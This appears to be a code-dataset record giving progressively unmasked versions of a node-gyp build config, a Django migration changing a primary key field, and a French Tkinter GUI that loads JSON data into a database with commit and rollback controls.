{ "blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1", "index": 8439, "step-1": "<mask token>\n", "step-2": "{'targets': [{'target_name': 'force-layout', 'sources': ['src/main.cc',\n 'src/layout.cc', 'src/quadTree.cc'], 'conditions': [['OS==\"win\"', {\n 'cflags': ['/WX', '/std:latest', '/m']}, {'cflags': ['-std=c++11',\n '-fpermissive', '-fexceptions']}]], 'cflags!': ['-fno-exceptions'],\n 'cflags_cc!': ['-fno-exceptions']}]}\n", "step-3": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): dependencies = [('cstasker', '0001_initial')] operations = [migrations.AlterField(model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False))] <|reserved_special_token_1|> from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [('cstasker', '0001_initial')] operations = [migrations.AlterField(model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False))] <|reserved_special_token_1|> # -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-04-12 12:37 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cstasker', '0001_initial'), ] operations = [ migrations.AlterField( model_name='usertask', name='ut_id', field=models.BigIntegerField(primary_key=True, serialize=False), ), ]
flexible
{ "blob_id": "2fbf312e1f8388008bb9ab9ba0ee4ccee1a8beae", "index": 3594, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('cstasker', '0001_initial')]\n operations = [migrations.AlterField(model_name='usertask', name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False))]\n", "step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('cstasker', '0001_initial')]\n operations = [migrations.AlterField(model_name='usertask', name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False))]\n", "step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.8 on 2018-04-12 12:37\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cstasker', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='usertask',\n name='ut_id',\n field=models.BigIntegerField(primary_key=True, serialize=False),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class DataLoader: <|reserved_special_token_0|> def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) <|reserved_special_token_0|> def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> <|reserved_special_token_0|> class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) <|reserved_special_token_0|> def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> <|reserved_special_token_0|> class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) def CaseCocher(self, mode='Transanction'): style = Style() style.configure('W.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='red') style.configure('G.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='green') def getCheckDict(obj): selectDate = {} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]] = [] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): choice = messagebox.askyesno('Askquestion!!!', 'Vous etes sur pour la validation') if choice == True: self.db.Alldayselected = getCheckDict(self.tree. get_checked()) if self.modeTransaction == False: self.db.insertCommunique() else: self.db.insertCommunique() else: messagebox.showerror(title='Erreur !!!', message= 'Cocher une case au moins !!!') def commit(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un commit?') if choice == True: messagebox.showinfo('Info', 'Mode Commit en cours') self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un rollback?') if choice == True: messagebox.showinfo('Info', 'Mode rollback en cours ') self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text= 'La liste des fichiers json obtenus avec leur arborescence', borderwidth=7, relief='groove') label_welcomec.grid(row=1, column=3, pady=8) vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview ) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert('', 'end', 'ALL', text='SELECT ALL') for key, val in self.anne.items(): self.tree.insert('ALL', 'end', key, text=key) for i in val: self.tree.insert(key, 'end', i, text=i) self.tree.grid(row=3, column=3, pady=2) button_name = Button(self.master, text='Valider', command=valider) button_name.grid(row=3, column=4, pady=2) if mode == 'Transanction': commit_buttoon_name = Button(self.master, text='COMMIT', command=commit, style='G.TButton') commit_buttoon_name.grid(row=4, column=3, pady=2) rollback_buttoon_name = Button(self.master, text='ROLLBACK !', style='W.TButton', command=rollback) rollback_buttoon_name.grid(row=4, column=4, pady=2) def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> from ttkwidgets import CheckboxTreeview from tkinter import * from tkinter.ttk import * from tkinter import messagebox import json import os from DbDataloader import * class DataLoader: def __init__(self, master): self.anne = {} self.master = Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900, 680) self.master.resizable(width=False, height=True) self.tree = CheckboxTreeview(self.master, height=25) os.chdir('DonneJson') with open('DonneUtile.json', 'r') as rf: self.anne.update(json.load(rf)) rf.close() os.chdir('..') self.Nomfichier = os.listdir('DonneJson') self.Nomfichier.sort(reverse=True) self.modeTransaction = False self.db = DbDataloader(self.modeTransaction, self.master) self.main() def main(self): choice = messagebox.askyesno('askquestion', 'Cliquer sur Oui pour charger les données en mode Trasactionnel') if choice: self.modeTransaction = True self.db.conn.start_transaction() self.master.title('Data Loader : Mode Transanction=\xadOUI') self.create_widgets() else: self.modeTransaction = False self.master.title('Data Loader : Mode Transanction=\xadNON') self.create_widgets('Non Transanction') def lireFichier(self): label_welcome1 = Label(self.master, text= 'Prévisualiser les données', borderwidth=7, width=40, relief= 'groove') label_welcome1.grid(row=1, column=0, padx=50) label_welcome2 = Label(self.master, text= 'Selectionner le fichier pour la lecture') label_welcome2.grid(row=2, column=0) listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE) i = 0 for fichier in self.Nomfichier: if '2' in fichier: listbox.insert(i, fichier) i = i + 1 def afficherObjet(Obj): try: os.chdir('DonneJson') textFichier = {} with open(Obj, 'r') as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte = '{\n' for key, val in textFichier.items(): b = '\t{\n' c = '\t' + str(key) + ' :\n' d = '' for key1, val1 in val.items(): d = str(d) + '\t\t' + str(key1) + ' :' + ' ' + str( val1) + '\n' e = '\t},\n' texte = texte + b + c + d + e texte = texte + '}\n' texte = texte + '\n\n\t' + str(len(textFichier) ) + ' Objets eenregistrer dans le fichier ' + Obj os.chdir('..') return texte except Exception as e: print(e) messagebox.showerror(title='Erreur !!!', message='Fichier ' + Obj + ' introuvable') def selected_item(): try: if listbox.get(listbox.curselection()): textes = afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) self.master.wait_visibility(fil) fil.grab_set() fil.geometry('600x600') fil.title('Fichier :' + listbox.get(listbox. curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil, wrap=NONE, height=30, width=100, yscrollcommand=yscroll.set, xscrollcommand= xscroll.set) text1.config(state='normal') text1.insert('1.0', textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except: messagebox.showerror(title='Erreur !!!', message= 'Vous selectionner un fichier d`abord') listbox.grid(row=3, column=0, pady=20) btn = Button(self.master, text='Lire Le Fichier', command=selected_item ) btn.grid(row=3, column=1, pady=6) def CaseCocher(self, mode='Transanction'): style = Style() style.configure('W.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='red') style.configure('G.TButton', font=('calibri', 15, 'bold', 'underline'), foreground='green') def getCheckDict(obj): selectDate = {} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]] = [] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): choice = messagebox.askyesno('Askquestion!!!', 'Vous etes sur pour la validation') if choice == True: self.db.Alldayselected = getCheckDict(self.tree. get_checked()) if self.modeTransaction == False: self.db.insertCommunique() else: self.db.insertCommunique() else: messagebox.showerror(title='Erreur !!!', message= 'Cocher une case au moins !!!') def commit(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un commit?') if choice == True: messagebox.showinfo('Info', 'Mode Commit en cours') self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice = messagebox.askyesno('Askquestion!!!', 'Vouliez-vouz faire un rollback?') if choice == True: messagebox.showinfo('Info', 'Mode rollback en cours ') self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text= 'La liste des fichiers json obtenus avec leur arborescence', borderwidth=7, relief='groove') label_welcomec.grid(row=1, column=3, pady=8) vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview ) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert('', 'end', 'ALL', text='SELECT ALL') for key, val in self.anne.items(): self.tree.insert('ALL', 'end', key, text=key) for i in val: self.tree.insert(key, 'end', i, text=i) self.tree.grid(row=3, column=3, pady=2) button_name = Button(self.master, text='Valider', command=valider) button_name.grid(row=3, column=4, pady=2) if mode == 'Transanction': commit_buttoon_name = Button(self.master, text='COMMIT', command=commit, style='G.TButton') commit_buttoon_name.grid(row=4, column=3, pady=2) rollback_buttoon_name = Button(self.master, text='ROLLBACK !', style='W.TButton', command=rollback) rollback_buttoon_name.grid(row=4, column=4, pady=2) def create_widgets(self, mode='Transanction'): self.lireFichier() self.CaseCocher(mode) def mains(self, obj): obj.master.mainloop() obj.db.conn.rollback() <|reserved_special_token_1|> from ttkwidgets import CheckboxTreeview from tkinter import * from tkinter.ttk import * from tkinter import messagebox import json import os from DbDataloader import * class DataLoader(): def __init__(self,master): self.anne={} self.master=Toplevel(master) master.wait_visibility(self.master) self.master.grab_set() self.master.minsize(900,680) self.master.resizable(width=False,height=True) self.tree = CheckboxTreeview(self.master,height=25) os.chdir("DonneJson") with open("DonneUtile.json","r") as rf: self.anne.update(json.load(rf)) rf.close() os.chdir("..") self.Nomfichier=os.listdir("DonneJson") self.Nomfichier.sort(reverse=True) self.modeTransaction=False self.db=DbDataloader(self.modeTransaction,self.master) self.main() #Fonction pour lire les fichiers json deja dans le module DataAcquisition def main(self): choice= messagebox.askyesno("askquestion","Cliquer sur Oui pour charger les données en mode Trasactionnel") if choice : self.modeTransaction=True self.db.conn.start_transaction() self.master.title("Data Loader : Mode Transanction=­OUI") self.create_widgets() else: self.modeTransaction=False self.master.title("Data Loader : Mode Transanction=­NON") self.create_widgets("Non Transanction") def lireFichier(self): label_welcome1 = Label(self.master,text="Prévisualiser les données", borderwidth = 7, width = 40, relief="groove" ) label_welcome1.grid(row = 1, column = 0, padx = 50) label_welcome2 = Label(self.master,text="Selectionner le fichier pour la lecture") label_welcome2.grid(row = 2, column = 0, ) listbox = Listbox(self.master, width=40, height=20,selectmode=SINGLE) i=0 for fichier in self.Nomfichier: if "2" in fichier: listbox.insert(i, fichier) i=i+1 def afficherObjet(Obj): try: os.chdir("DonneJson") textFichier={} with open(Obj,"r") as rf: textFichier.update(json.load(rf)) rf.close() if textFichier: texte="{\n" for key,val in textFichier.items(): b ="\t{\n" c="\t"+str(key)+" :\n" d="" for key1,val1 in val.items(): d=str(d)+"\t\t"+str(key1)+" :"+" "+str(val1)+"\n" e="\t},\n" texte=texte+b+c+d+e texte=texte+"}\n" texte=texte+"\n\n\t"+str(len(textFichier))+" Objets eenregistrer dans le fichier "+Obj os.chdir("..") return texte except Exception as e: print(e) messagebox.showerror(title="Erreur !!!", message="Fichier "+Obj+" introuvable") def selected_item(): try: if listbox.get(listbox.curselection()): textes=afficherObjet(listbox.get(listbox.curselection())) if textes: fil = Toplevel(self.master) # fenetre blocante : empeche l’ouverture de fenetres identiques self.master.wait_visibility(fil) fil.grab_set() # end fenetre blocante fil.geometry("600x600") fil.title("Fichier :"+listbox.get(listbox.curselection())) yscroll = Scrollbar(fil) yscroll.pack(side=RIGHT, fill=Y) xscroll = Scrollbar(fil, orient=HORIZONTAL) xscroll.pack(side=BOTTOM, fill=X) text1 = Text(fil,wrap=NONE,height=30, width=100,yscrollcommand=yscroll.set, xscrollcommand=xscroll.set) text1.config(state="normal") text1.insert("1.0",textes) text1.pack(side=LEFT) yscroll.config(command=text1.yview) xscroll.config(command=text1.xview) fil.mainloop() fil.quit() except : messagebox.showerror(title="Erreur !!!", message="Vous selectionner un fichier d`abord") listbox.grid(row = 3, column = 0, pady =20 ) btn = Button(self.master, text='Lire Le Fichier', command=selected_item) btn.grid(row = 3, column = 1, pady =6 ) #Fonction pour cocher les dates ensuite enregistrer vers la bases de donneef def CaseCocher(self,mode="Transanction"): style = Style() style.configure('W.TButton', font = ('calibri', 15, 'bold', 'underline'), foreground = 'red') style.configure('G.TButton', font = ('calibri', 15, 'bold','underline'), foreground = 'green') #recuperer les ligne selectionnes def getCheckDict(obj): selectDate={} for t in obj: try: selectDate[t[:7]].append(t) except: selectDate[t[:7]]=[] selectDate[t[:7]].append(t) return selectDate def valider(): if self.tree.get_checked(): #si il choisi oui (en transanction) choice= messagebox.askyesno("Askquestion!!!","Vous etes sur pour la validation") if choice==True: self.db.Alldayselected =getCheckDict(self.tree.get_checked()) if self.modeTransaction == False: #Mode Non Transactionnel self.db.insertCommunique() else: #Mode Transaction self.db.insertCommunique() else: messagebox.showerror(title="Erreur !!!", message="Cocher une case au moins !!!") def commit(): choice= messagebox.askyesno("Askquestion!!!","Vouliez-vouz faire un commit?") if choice==True: messagebox.showinfo("Info","Mode Commit en cours") self.db.conn.commit() self.db.conn.start_transaction() def rollback(): choice= messagebox.askyesno("Askquestion!!!","Vouliez-vouz faire un rollback?") if choice==True: messagebox.showinfo("Info","Mode rollback en cours ") self.db.conn.rollback() self.db.conn.start_transaction() label_welcomec = Label(self.master, text="La liste des fichiers json obtenus avec leur arborescence", borderwidth = 7, relief="groove") label_welcomec.grid(row = 1, column = 3, pady = 8) vsb = Scrollbar(self.master, orient="vertical", command=self.tree.yview) vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.020) self.tree.configure(yscrollcommand=vsb.set) self.tree.insert("", "end", "ALL", text="SELECT ALL") for key,val in self.anne.items(): self.tree.insert("ALL", "end", key, text=key) for i in val: self.tree.insert(key,"end", i, text=i) self.tree.grid(row = 3, column = 3, pady = 2) button_name=Button(self.master,text="Valider",command=valider) button_name.grid(row = 3, column = 4, pady = 2) if mode=="Transanction": commit_buttoon_name=Button(self.master,text="COMMIT",command=commit,style="G.TButton" ) commit_buttoon_name.grid(row = 4, column = 3, pady = 2) rollback_buttoon_name=Button(self.master, text = 'ROLLBACK !', style = 'W.TButton',command=rollback) rollback_buttoon_name.grid(row = 4, column = 4, pady = 2) def create_widgets(self,mode="Transanction"): self.lireFichier() self.CaseCocher(mode) def mains(self,obj): obj.master.mainloop() obj.db.conn.rollback()
flexible
{ "blob_id": "a70dae504a4dfa3997a11e4c605accfab0024318", "index": 8796, "step-1": "<mask token>\n\n\nclass DataLoader:\n <mask token>\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n <mask token>\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-2": "<mask token>\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n 